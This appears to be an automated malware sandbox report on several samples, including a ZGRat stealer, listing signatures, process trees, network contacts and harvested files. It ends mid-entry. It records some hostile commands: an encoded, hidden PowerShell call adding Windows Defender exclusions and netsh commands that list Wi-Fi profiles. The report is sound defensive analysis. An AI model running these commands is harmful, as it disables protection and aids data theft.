SHA512 0c0d50920055b3a2343154acbe8e6d1a3490ce7ae403a21a9b385309805338ba05163500439ab85d30d1d2bb5c742009bb2b0c25d74533ba24780d31efe5c945

Analysis: behavioral22

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

150s

Max time network

151s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\down.png

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\down.png

Network

Country Destination Domain Proto
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 18.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 28.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 58.189.79.40.in-addr.arpa udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

128s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe"

Signatures

Detect ZGRat V1

ZGRat

rat zgrat

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 640 set thread context of 4480 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 640 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe
PID 4480 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe C:\Windows\SysWOW64\cmd.exe
PID 2240 wrote to memory of 3248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2240 wrote to memory of 4360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2240 wrote to memory of 4632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4480 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe C:\Windows\SysWOW64\cmd.exe
PID 2268 wrote to memory of 3088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2268 wrote to memory of 4240 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe"

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 41.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 magic.poisontoolz.com udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 90.10.21.104.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 evcs-ocsp.ws.symantec.com udp
US 152.199.19.74:80 evcs-ocsp.ws.symantec.com tcp
US 8.8.8.8:53 74.19.199.152.in-addr.arpa udp
US 8.8.8.8:53 79.179.17.96.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 29.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 udp
N/A 162.159.133.233:443 tcp
IN 52.140.118.28:443 tcp
N/A 104.18.115.97:80 tcp
N/A 20.166.126.56:443 tcp
N/A 104.77.160.28:80 tcp
N/A 151.80.29.83:443 tcp
N/A 136.175.8.205:443 tcp
GB 96.16.110.114:80 tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Buildcrypt.exe.log

MD5 c3941d9fa38f1717d5cecd7a2ca71667
SHA1 33b5362675383b58b4166ed9f9a61e5aa6768d2e
SHA256 f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256
SHA512 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45

C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\Browsers\Firefox\Bookmarks.txt

MD5 2e9d094dda5cdc3ce6519f75943a4ff4
SHA1 5d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256 c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512 d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\System\Process.txt

MD5 1ee536f8825f6e2687ef66d381d8f207
SHA1 226510773d4cce296c65a148113cc8748dcd2eb5
SHA256 17f9cee741ac5c44270e2e06cffe0733c0048eeff575a722552ab3faa60c22e4
SHA512 0e7be43674727276b6a1ca1b1b96cca435f9dc1feefce7a150632f171313b365ee59bc842244c6dfaf53b951bff3f9cad781ea70795cfed163db767f50a55e7f

C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\System\Apps.txt

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\System\Apps.txt

MD5 b1d58554f33c991f9454f81bf1f6a7a6
SHA1 1a9c0748fbb4c4974315f6a3188ffb5078372de1
SHA256 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c
SHA512 ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6

C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\System\ProductKey.txt

MD5 71eb5479298c7afc6d126fa04d2a9bde
SHA1 a9b3d5505cf9f84bb6c2be2acece53cb40075113
SHA256 f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3
SHA512 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd

C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\Directories\Videos.txt

MD5 1fddbf1169b6c75898b86e7e24bc7c1f
SHA1 d2091060cb5191ff70eb99c0088c182e80c20f8c
SHA256 a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733
SHA512 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d

C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\Directories\Startup.txt

MD5 68c93da4981d591704cea7b71cebfb97
SHA1 fd0f8d97463cd33892cc828b4ad04e03fc014fa6
SHA256 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483
SHA512 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402

C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\msgid.dat

MD5 9d694ab3d634fb05b97a4b4e72a69c3d
SHA1 c71f80418ae48b90d4128ab03ac26e4c8c8f8c41
SHA256 b61a8732dc7f3679fa4e0cf02bdbc1d61a813adaafa9df7a0aba53d9127902f9
SHA512 a7eb902af143b7aeae5fb063c303ff90023dce6d16c40e09f1fa7847c453f0e3864f7623daefe9a4d1f71a8c75f27b55ed9bfd0c137e8d607b1fbbd4c5b26327

Analysis: behavioral15

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231222-en

Max time kernel

0s

Max time network

148s

Command Line

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Spaufgty.wav"

Signatures

Processes

C:\Program Files (x86)\Windows Media Player\wmplayer.exe

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Spaufgty.wav"

C:\Program Files (x86)\Windows Media Player\setup_wm.exe

"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Spaufgty.wav"

C:\Windows\SysWOW64\unregmp2.exe

"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon

C:\Windows\system32\unregmp2.exe

"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT

Network

Country Destination Domain Proto
US 8.8.8.8:53 wmploc.dll udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 41.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 23.160.77.104.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 31.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\wmsetup.log

MD5 dbbe3b2e56558f128653635d80156427
SHA1 692dcec13ab48af5614982611af2cc048a30035f
SHA256 62ea3456f7158f1d8fa340cdcb9e7cf18f4763c66829c0aba175f6cd873e8961
SHA512 e47e76b71849f45a54b172762dcd023d6bdf03d37e3c22f33424a986863a24741352a7f021ea974cd42f15424ec6cf64dc436c16ea11f6572407bc09541c5a08

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

MD5 7050d5ae8acfbe560fa11073fef8185d
SHA1 5bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256 cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512 a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

MD5 d44d10fd7d523b4d7a542884b3d0c6c0
SHA1 802e80c8ed851937837bbe3e125d82a6b9a62adc
SHA256 41536c80d8df63804cbea59bfaab27bf06e8ae682b88a961a2c4a66db5bc15e5
SHA512 363963e55185b9e3a13f2de14c3170548172556d432defb358e7d28a2dba6c7f3cfb6a2891ca2f5fc99e8bc13bbf51973bbede5765a6ee9f15bf9f89622213e4

Analysis: behavioral26

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

149s

Max time network

159s

Command Line

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe"

Signatures

Detect ZGRat V1

ZGRat

rat zgrat

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4044 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe
PID 3740 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
PID 3740 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
PID 5080 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Processes

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe"

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABMAGUAZwBhAGwAQgBsAG8AYwBrAFMAaQB6AGUAcwAuAGUAeABlADsA

C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe

C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe

C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe

C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe

C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe

C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABMAGUAZwBhAGwAQgBsAG8AYwBrAFMAaQB6AGUAcwAuAGUAeABlADsA

Network

Country Destination Domain Proto
US 8.8.8.8:53 41.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 magic.poisontoolz.com udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 114.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 90.10.21.104.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 28.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

memory/4044-0-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/4044-1-0x00000000003B0000-0x00000000003C4000-memory.dmp

memory/4044-2-0x00000000027B0000-0x00000000027C0000-memory.dmp

memory/4044-3-0x0000000002780000-0x0000000002786000-memory.dmp

memory/4044-4-0x0000000005880000-0x00000000059AA000-memory.dmp

memory/4044-5-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-6-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-8-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-10-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-12-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-18-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-20-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-24-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-26-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-22-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-16-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-14-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-28-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-30-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-32-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-34-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-36-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-38-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-42-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-46-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-50-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-52-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-56-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-60-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-62-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-64-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-58-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-66-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-54-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-48-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-44-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-40-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-68-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-937-0x00000000059C0000-0x00000000059C1000-memory.dmp

memory/4044-938-0x0000000005BA0000-0x0000000005C60000-memory.dmp

memory/4044-939-0x0000000005CA0000-0x0000000005CEC000-memory.dmp

memory/4044-940-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/4044-941-0x00000000027B0000-0x00000000027C0000-memory.dmp

memory/4044-942-0x0000000006490000-0x0000000006A34000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yagacrypt.exe.log

MD5 c3941d9fa38f1717d5cecd7a2ca71667
SHA1 33b5362675383b58b4166ed9f9a61e5aa6768d2e
SHA256 f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256
SHA512 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45

memory/208-946-0x0000000000400000-0x000000000049C000-memory.dmp

memory/208-947-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/208-949-0x0000000003110000-0x0000000003120000-memory.dmp

memory/208-948-0x00000000056D0000-0x00000000057B8000-memory.dmp

memory/4044-952-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/208-3179-0x0000000005830000-0x0000000005886000-memory.dmp

memory/208-3180-0x0000000005AC0000-0x0000000005B26000-memory.dmp

memory/208-3181-0x0000000005EF0000-0x0000000005F44000-memory.dmp

memory/208-3182-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/208-3184-0x0000000074B00000-0x00000000752B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d42etw3k.fcj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2308-3190-0x00007FFE09850000-0x00007FFE0A311000-memory.dmp

memory/2308-3191-0x000001C2DC300000-0x000001C2DC310000-memory.dmp

memory/2308-3196-0x000001C2DC2D0000-0x000001C2DC2F2000-memory.dmp

memory/2308-3197-0x000001C2DC300000-0x000001C2DC310000-memory.dmp

memory/2308-3200-0x00007FFE09850000-0x00007FFE0A311000-memory.dmp

C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe

MD5 0abd42634db4f4fb3bbbcaa066413d68
SHA1 074f62ae3b24d775f09e98e81e857e6f1be05f3b
SHA256 a2ac7be629121924985b42fdf34380efe12be78a3d8665b625a2eae80808cff4
SHA512 578ef89e668c8e38e66353f485be2b90ebf8ec21bcf0f5de0ec65ee0710b55256876f28219e540beaf2dea41224c51355dc9a39930cfa3b231b3450264ac47d2

memory/3740-3203-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/3740-3204-0x0000000005350000-0x0000000005360000-memory.dmp

memory/3740-4137-0x0000000005FF0000-0x0000000005FF1000-memory.dmp

memory/5080-4143-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/5080-4144-0x0000000005130000-0x0000000005140000-memory.dmp

memory/3740-4145-0x0000000005350000-0x0000000005360000-memory.dmp

memory/3740-4146-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/4404-6376-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/5080-6377-0x0000000074B00000-0x00000000752B0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/1468-6748-0x00007FFE09850000-0x00007FFE0A311000-memory.dmp

memory/1468-6765-0x00000159D10E0000-0x00000159D10F0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

memory/1468-7031-0x00000159D10E0000-0x00000159D10F0000-memory.dmp

memory/1468-7192-0x00000159D10E0000-0x00000159D10F0000-memory.dmp

memory/4404-7325-0x0000000005990000-0x0000000005991000-memory.dmp

memory/1468-7327-0x00007FFE09850000-0x00007FFE0A311000-memory.dmp

memory/4404-7328-0x0000000074B00000-0x00000000752B0000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

153s

Max time network

160s

Command Line

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RIB.pdf"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
